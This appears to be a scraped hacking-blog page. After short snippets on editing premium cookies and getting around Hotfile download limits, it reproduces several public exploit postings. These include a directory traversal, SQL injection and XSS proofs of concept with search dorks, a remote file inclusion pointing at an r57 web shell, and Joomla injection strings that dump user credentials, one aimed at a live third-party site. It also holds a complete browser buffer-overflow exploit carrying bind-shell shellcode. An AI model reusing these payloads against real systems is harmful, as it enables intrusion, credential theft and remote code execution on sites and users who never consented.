Here is the general tutorial to add or edit premium cookies. Requirements: Web Developer Add on Step 1: Install Web Developer Add on Install the Web developer add on. Using this add on we are going to edit the cookies http://hackertutorial.blogspot.com/.
Definition: The act of keeping your identity hidden online by using connection methods and encryption methods, to make yourself untraceable to a person, website, company, school or whatever else you are doing/connecting to.
Hi Friends, i think this is my first about hotfile. Hotfile is file sharing website. In hotfile , downloading speed for normal user is very slow. But for premium account it will be faster. In this post, i am going to explain how to downlod files from hotfile like...
Knowledge discovery and data mining construes of techniques that assists in discovering associations within a given dataset. A few techniques that facilitate extraction of knowledge from data are machine learning, soft computing, statistical techniques, pattern recognition, and visualization....
Digital forensics has existed for as long as computers have stored data that could be used as evidence. For many years, digital forensics was performed primarily by government agencies, but has become common in the commercial sector over the past several years. Digital forensics has three major...
# # Title : phpShowtime Directory Travel # Author : Red Security TEAM # Date : 31/01/2012 # Download : http://phpshowtime.kybernetika.de/ # Demo : http://phpshowtime.kybernetika.de/demo/ # Tested On : CentOS # Contact : Info [ 4t ] RedSecurity [ d0t ] COM # Home : http://RedSecurity.COM # # Exploit : # # http://server/index.php?r=i/[Your Directory] # Example : http://server/index.php?r=i/../../ #
# Exploit Title: DIGIT Cms SQL Injection / XSS Multiple Vulnerability
# Date: 2012-01-05 [GMT +7]
# Author: BHG Security Center
# Software Link: http://www.dig-it.co.il/
# Vendor Response(s): They didn't respond to the emails.
# Dork: intext:"Site by DIGIT"
# Version : [1.0.7]
# Tested on: ubuntu 11.04
# CVE : -
# Finder(s):
- Net.Edit0r (Net.edit0r [at] att [dot] net)
- G3n3Rall (Ant1_s3cur1ty [at] yahoo [dot] com)
-----------------------------------------------------------------------------------------
DIGIT Israel Cms SQL Injection / XSS Multiple Vulnerability
-----------------------------------------------------------------------------------------
Author : BHG Security Center
Date : 2012-01-05
Location : Iran
Web : http://Black-Hg.Org
Critical Lvl : Medium
Where : From Remote
My Group : Black Hat Group #BHG
---------------------------------------------------------------------------
PoC/Exploit:
~~~~~~~~~~
~ [PoC] ~: /website_path/Default.asp?sType=0&PageId=[Sqli]
~ [PoC]Http://[victim]/path/Default.asp?sType=0&PageId=[Sqli]
Enter In Search Box XSS Code ~
<FORM action="Default.asp?PageId=-1" method=POST id=searchFORM
name=searchFORM style="margin:0;padding:0">
<INPUT type="hidden" value="" name="txtSEARCH">
</FORM>
~ [PoC] ~: Http://[victim]/path/Default.asp
Note: There are vulnerabilities in the search field that you can use
Timeline:
~~~~~~~~~
- 02 - 01 - 2012 bug found.
- 03 - 01 - 2012 vendor contacted, but no response.
- 05 - 01 - 2012 Advisories release.
Important Notes:
~~~~~~~~~
- Vendor did not respond to the email as well as the phone. As there
is not any contact form or email address in
- the website, we have used all the emails which had been found by
searching in Google such as support, info, and so on.
---------------------------------------------------------------------------
Greetz To:A.Cr0x | 3H34N | tHe.k!ll3r | Mr.XHat |NoL1m1t |Bl4ck.Viper
Spical Th4nks: B3hz4d | ArYaIeIrAN| _SENATOR_ |Cyber C0der And All My Friendz
[!] Persian Gulf 4 Ever
[!] I Love Iran And All Iranian People
Greetz To : 1337day.com ~ exploit-db.com [h4ckcity tM] And All Iranian HackerZ
-------------------------------- [ EOF ] ----------------------------------
# Exploit Title: Priza Israel Cms SQL Injection / XSS Multiple Vulnerability
# Date: 2012-01-05 [GMT +7]
# Author: BHG Security Center
# Software Link: http://www.priza.co.il/
# Vendor Response(s): They didn't respond to the emails.
# Dork: intext:"Powered by Priza"
# Version : [0.0.2]
# Tested on: ubuntu 11.04
# CVE : -
# Finder(s):
- Net.Edit0r (Net.edit0r [at] att [dot] net)
- G3n3Rall (Ant1_s3cur1ty [at] yahoo [dot] com)
-----------------------------------------------------------------------------------------
Priza Israel Cms SQL Injection / XSS Multiple Vulnerability
-----------------------------------------------------------------------------------------
Author : BHG Security Center
Date : 2012-01-05
Location : Iran
Web : http://Black-Hg.Org
Critical Lvl : Medium
Where : From Remote
My Group : Black Hat Group #BHG
---------------------------------------------------------------------------
PoC/Exploit:
~~~~~~~~~~
~ [PoC] ~: /website_path/index.asp?p_id=201&id=[SQLi]
~ [PoC] ~: /website_path/index.asp?page_id=[SQLi]
~ [PoC] ~: /website_path/volumes.asp?id=18
~ [PoC] ~: /website_path/index.asp?action=find&page_id=28&string=[Xss]
~~~~~~~~ Exploit
~ [PoC] ~: Http://[victim]/path/index.asp?p_id=201&id=[SQLi]
~ [PoC] ~: Http://[victim]/path/index.asp?action=find&page_id=28&string="><script>alert(0)</script>
Timeline:
~~~~~~~~~
- 02 - 01 - 2012 bug found.
- 03 - 01 - 2012 vendor contacted, but no response.
- 05 - 01 - 2012 Advisories release.
Important Notes:
~~~~~~~~~
- Vendor did not respond to the email as well as the phone. As there
is not any contact form or email address in
- the website, we have used all the emails which had been found by
searching in Google such as support, info, and so on.
---------------------------------------------------------------------------
Greetz To:A.Cr0x | 3H34N | tHe.k!ll3r | Mr.XHat |NoL1m1t |Bl4ck.Viper
Spical Th4nks: B3hz4d | ArYaIeIrAN| _SENATOR_ |Cyber C0der And All My Friendz
[!] Persian Gulf 4 Ever
[!] I Love Iran And All Iranian People
Greetz To : 1337day.com ~ exploit-db.com [h4ckcity tM] And All Iranian HackerZ
-------------------------------- [ EOF ] ----------------------------------
##################################################################### # # Facebook Newsroom Application Remote File Inclusion Vulnerability # ##################################################################### # # Discovered by : Ciph3r # # # MAIL : Ciph3r_blackhat@yahoo.com # # # SP tanx4: Iranian hacker & Kurdish security TEAM # # sp TANX2: milw0rm.com & google.com & sourceforge.net # # CMS download : http://sourceforge.net/project/showfiles.php?group_id=221515 # # class : remote # # risk : high # # message : agha kovat tavalodet mobarak ! inam kadoye tavalodet :d ####################################################################### # # C0de : # # # require_once ($path.'/classes/feedStories.class.php'); # # ####################################################################### EXPLOIT : www.[Target].com/path/includes/home.php?path=[r57.txt?] ####################################################################### # milw0rm.com [2008-07-11]
############################################################################################################# ## Joomla Component com_facebook SQL injection vulnerability - (id) ## ## Author : kaMtiEz (kamzcrew@gmail.com) ## ## Homepage : http://www.indonesiancoder.com ## ## Date : September 22, 2009 ## ############################################################################################################# ############################################################################################################# # /~~\__/~~\_/~~~~\_/~~\_______/~~\__________________/~~~~~\__ # # /~~\_/~~\___/~~\__/~~\_______/~~\_________________/~~\_/~~\_ # # /~~~~~\_____/~~\__/~~\_______/~~\_______/~~~~~~~\__/~~~~~\__ # # /~~\_/~~\___/~~\__/~~\_______/~~\____________________/~~\___ # # /~~\__/~~\_/~~~~\_/~~~~~~~~\_/~~~~~~~~\_____________/~~\____ # #____________________________________________________________ -=- KILL-9 CREW -=- INDONESIANCODER -=- # # # ############################################################################################################# [ Software Information ] [+] Vendor : - [+] Download : http://joomlacode.org/gf/project/joomla-facebook/ [+] version : - [+] Vulnerability : SQL injection [+] Dork : inurl:"com_facebook" ############################################################################################################# [ Vulnerable File ] http://127.0.0.1/index.php?option=com_facebook&view=student&id=[INDONESIANCODER] [ Exploit ] -666+union+select+1,2,concat_ws(0x3a,username,password),4,5,6,7,8,9,10,11,12+from+jos_users-- [ Demo ] http://www.engineering.edu.sg/index.php?option=com_facebook&view=student&id=-666+union+select+1,2,concat_ws(0x3a,username,password),4,5,6,7,8,9,10,11,12+from+jos_users-- ############################################################################################################# [ Thx TO ] [+] INDONESIAN CODER TEAM KILL-9 CREW KIRIK CREW [+] tukulesto,M3NW5,arianom,tiw0L,Pathloader,abah_benu,VycOd,och3_an3h [+] Contrex,onthel,yasea,bugs,olivia,Jovan,Aar,Ardy,invent,Ronz [+] Coracore,black666girl,NepT,ichal,tengik,Gh4mb4s,rendy,devil_nongkrong and YOU!! [ NOTE ] [+] Mom and dad i love u .. for my girlfriends thx for your support mwahhhh ^_^ [+] terima kasih banget buat tukulesto dan arianom yang setiap malam menemani saya waktu exploit .. wkwkwkw [+] terima kasih buat vYc0d dan devil_nongkrong yang menemani saya waktu YM an .. wkwkwkkwkw [ QUOTE ] [+] kaMtiEz -=- Don Tukulesto -=- M3NW5 -=- 30 hari mencari AuraKasih .... [+] AURAKASIH I LOVE U FULL arghhhhh ...
<!--FaceBook PhotoUploader Buffer Overflow Exploit |
written by e.b. |
Tested on Windows XP SP2(fully patched) English, IE6, ImageUploader4.ocx 4.5.57.0(FaceBookPhotoUploader2.cab) |
The following controls are also vulnerable: |
Aurigma ImageUploader4 4.5.70.0 and 4.5.126.0 |
----------------------------- |
{6E5E167B-1566-4316-B27F-0DDAB3484CF7} |
Buffer Offset: 289 |
Aurigma ImageUploader4 4.6.17.0 |
----------------------------- |
{6E5E167B-1566-4316-B27F-0DDAB3484CF7} |
Buffer Offset: 261 |
Aurigma ImageUploader5 5.0.10.0 |
------------------------------- |
{BA162249-F2C5-4851-8ADC-FC58CB424243} |
Buffer Offset: 261 |
Thanks to h.d.m. and the Metasploit crew |
--> |
<html> |
<head> |
<title>FaceBook PhotoUploader Buffer Overflow Exploit</title> |
<script language="JavaScript" defer> |
function Check() { |
var buf = unescape("%u4141"); |
while (buf.length <= 261) buf = buf + unescape("%u4141"); |
// win32_exec - EXITFUNC=seh CMD=c:\windows\system32\calc.exe Size=378 Encoder=Alpha2 http://metasploit.com |
var shellcode1 = unescape("%u03eb%ueb59%ue805%ufff8%uffff%u4949%u4949%u4949" + |
"%u4948%u4949%u4949%u4949%u4949%u4949%u5a51%u436a" + |
"%u3058%u3142%u4250%u6b41%u4142%u4253%u4232%u3241" + |
"%u4141%u4130%u5841%u3850%u4242%u4875%u6b69%u4d4c" + |
"%u6338%u7574%u3350%u6730%u4c70%u734b%u5775%u6e4c" + |
"%u636b%u454c%u6355%u3348%u5831%u6c6f%u704b%u774f" + |
"%u6e68%u736b%u716f%u6530%u6a51%u724b%u4e69%u366b" + |
"%u4e54%u456b%u4a51%u464e%u6b51%u4f70%u4c69%u6e6c" + |
"%u5964%u7350%u5344%u5837%u7a41%u546a%u334d%u7831" + |
"%u4842%u7a6b%u7754%u524b%u6674%u3444%u6244%u5955" + |
"%u6e75%u416b%u364f%u4544%u6a51%u534b%u4c56%u464b" + |
"%u726c%u4c6b%u534b%u376f%u636c%u6a31%u4e4b%u756b" + |
"%u6c4c%u544b%u4841%u4d6b%u5159%u514c%u3434%u4a44" + |
"%u3063%u6f31%u6230%u4e44%u716b%u5450%u4b70%u6b35" + |
"%u5070%u4678%u6c6c%u634b%u4470%u4c4c%u444b%u3530" + |
"%u6e4c%u6c4d%u614b%u5578%u6a58%u644b%u4e49%u6b6b" + |
"%u6c30%u5770%u5770%u4770%u4c70%u704b%u4768%u714c" + |
"%u444f%u6b71%u3346%u6650%u4f36%u4c79%u6e38%u4f63" + |
"%u7130%u306b%u4150%u5878%u6c70%u534a%u5134%u334f" + |
"%u4e58%u3978%u6d6e%u465a%u616e%u4b47%u694f%u6377" + |
"%u4553%u336a%u726c%u3057%u5069%u626e%u7044%u736f" + |
"%u4147%u4163%u504c%u4273%u3159%u5063%u6574%u7035" + |
"%u546d%u6573%u3362%u306c%u4163%u7071%u536c%u6653" + |
"%u314e%u7475%u7038%u7765%u4370"); |
// win32_bind - EXITFUNC=seh LPORT=4444 Size=696 Encoder=Alpha2 http://metasploit.com |
var shellcode2 = unescape("%u03eb%ueb59%ue805%ufff8%uffff%u4949%u4949%u4949" + |
"%u4949%u4949%u4949%u4949%u4949%u4937%u5a51%u436a" + |
"%u3058%u3142%u4150%u6b42%u4141%u4153%u4132%u3241" + |
"%u4142%u4230%u5841%u3850%u4241%u7875%u4b69%u724c" + |
"%u584a%u526b%u4a6d%u4a48%u6b59%u6b4f%u694f%u416f" + |
"%u4e70%u526b%u744c%u4164%u6e34%u376b%u5535%u4c6c" + |
"%u714b%u646c%u6145%u7468%u6a41%u6e4f%u626b%u326f" + |
"%u6c38%u334b%u376f%u5550%u7851%u316b%u6c59%u504b" + |
"%u6e34%u466b%u6861%u456e%u6f61%u6c30%u6c59%u6b6c" + |
"%u3934%u4150%u3764%u6877%u6941%u565a%u636d%u4b31" + |
"%u7872%u6c6b%u7534%u566b%u3134%u5734%u5458%u6b35" + |
"%u6e55%u336b%u556f%u7474%u7841%u416b%u4c76%u464b" + |
"%u626c%u6e6b%u416b%u354f%u564c%u6861%u666b%u3663" + |
"%u6c4c%u6b4b%u7239%u444c%u5764%u616c%u4f71%u4733" + |
"%u6b41%u336b%u4c54%u634b%u7073%u6c30%u534b%u6470" + |
"%u6c4c%u724b%u4550%u4e4c%u6c4d%u374b%u7530%u7358" + |
"%u426e%u4c48%u524e%u466e%u586e%u566c%u3930%u586f" + |
"%u7156%u4676%u7233%u6346%u3058%u7033%u3332%u5458" + |
"%u5237%u4553%u5162%u504f%u4b54%u5a4f%u3370%u6a58" + |
"%u686b%u596d%u456c%u466b%u4930%u596f%u7346%u4e6f" + |
"%u5869%u7365%u4d56%u5851%u366d%u6468%u7242%u7275" + |
"%u674a%u5972%u6e6f%u7230%u4a48%u5679%u6b69%u6e45" + |
"%u764d%u6b37%u584f%u3356%u3063%u5053%u7653%u7033" + |
"%u3353%u5373%u3763%u5633%u6b33%u5a4f%u3270%u5046" + |
"%u3568%u7141%u304c%u3366%u6c63%u6d49%u6a31%u7035" + |
"%u6e68%u3544%u524a%u4b50%u7177%u4b47%u4e4f%u3036" + |
"%u526a%u3130%u7041%u5955%u6e6f%u3030%u6c68%u4c64" + |
"%u546d%u796e%u3179%u5947%u596f%u4646%u6633%u6b35" + |
"%u584f%u6350%u4b58%u7355%u4c79%u4146%u6359%u4b67" + |
"%u784f%u7656%u5330%u4164%u3344%u7965%u4e6f%u4e30" + |
"%u7173%u5878%u6167%u6969%u7156%u6269%u3977%u6a6f" + |
"%u5176%u4945%u4e6f%u5130%u5376%u715a%u7274%u6246" + |
"%u3048%u3063%u6c6d%u5a49%u6345%u625a%u7670%u3139" + |
"%u5839%u4e4c%u4d69%u5337%u335a%u4e74%u4b69%u5652" + |
"%u4b51%u6c70%u6f33%u495a%u336e%u4472%u6b6d%u374e" + |
"%u7632%u6e4c%u6c73%u704d%u767a%u6c58%u4e6b%u4c4b" + |
"%u736b%u5358%u7942%u6d6e%u7463%u6b56%u304f%u7075" + |
"%u4b44%u794f%u5346%u706b%u7057%u7152%u5041%u4251" + |
"%u4171%u337a%u4231%u4171%u5141%u6645%u6931%u5a6f" + |
"%u5070%u6e68%u5a4d%u5679%u6865%u334e%u3963%u586f" + |
"%u6356%u4b5a%u4b4f%u704f%u4b37%u4a4f%u4c70%u614b" + |
"%u6b47%u4d4c%u6b53%u3174%u4974%u596f%u7046%u5952" + |
"%u4e6f%u6330%u6c58%u6f30%u577a%u6174%u324f%u4b73" + |
"%u684f%u3956%u386f%u4350"); |
var next_seh_pointer = unescape("%u06EB%u9090"); //2 byte jump |
//oleacc.dll Windows XP SP2 English 0x74C96950 pop ebp - pop - retbis |
//no SafeSEH |
var seh_handler = unescape("%u6950%u74C9"); |
var nop = unescape("%u9090%u9090%u9090%u9090%u9090%u9090"); |
var m = buf + next_seh_pointer + seh_handler + nop + shellcode1 + nop; |
obj.ExtractIptc = m; |
//obj.ExtractExif = m; |
} |
</script> |
</head> |
<body onload="JavaScript: return Check();"> |
<object id="obj" classid="clsid:5C6698D9-7BE4-4122-8EC5-291D84DBD4A0"> |
Unable to create object |
</object> |
</body> |
</html> |
# milw0rm.com [2008-02-03]
[!]===========================================================================[!] [~] Joomla Component GBU FACEBOOK SQL injection vulnerability [~] Author : kaMtiEz (kamzcrew@yahoo.com) [~] Homepage : http://www.indonesiancoder.com [~] Date : 20 april, 2010 [!]===========================================================================[!] [ Software Information ] [+] Vendor : http://www.gbugrafici.nl/gbufacebook/ [+] Price : free [+] Vulnerability : SQL [+] Dork : inurl:"CIHUY" ;) [+] Download : http://www.gbugrafici.nl/gbufacebook/com_gbufacebook.zip [+] Version : 1.0.5 or lower maybe also affected [!]===========================================================================[!] [ Vulnerable File ] http://127.0.0.1/index.php?option=com_gbufacebook&task=show_face&face_id=[INDONESIANCODER] [ XpL ] -999.9'+UNION+ALL+SELECT+1,concat_ws(0x3a,username,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16+from+jos_users--+and+'kaMtiEz'='kaMtiEz etc etc etc ;] [!]===========================================================================[!] [ Thx TO ] [+] INDONESIAN CODER TEAM MainHack ServerIsDown SurabayaHackerLink IndonesianHacker MC-CREW [+] tukulesto,M3NW5,arianom,N4CK0,Jundab,d0ntcry,bobyhikaru,gonzhack,senot [+] Contrex,YadoY666,yasea,bugs,Ronz,Pathloader,cimpli,MarahMerah.IBL13Z,r3m1ck [+] Coracore,Gh4mb4s,Jack-,VycOd,m0rgue,otong,CS-31,yur4kh4 [ NOTE ] [+] WE ARE ONE UNITY, WE ARE A CODER FAMILY, AND WE ARE INDONESIAN CODER TEAM [+] jika kami bersama nyalakan tanda bahaya :) [+] Ayy : Ceped sembuh bebh .. lup u :"> [+] Don Tukulesto and Acild : thanks for coming in my t0wn :D [ QUOTE ] [+] INDONESIANCODER still r0x [+] nothing secure ..
Posts
All Comments
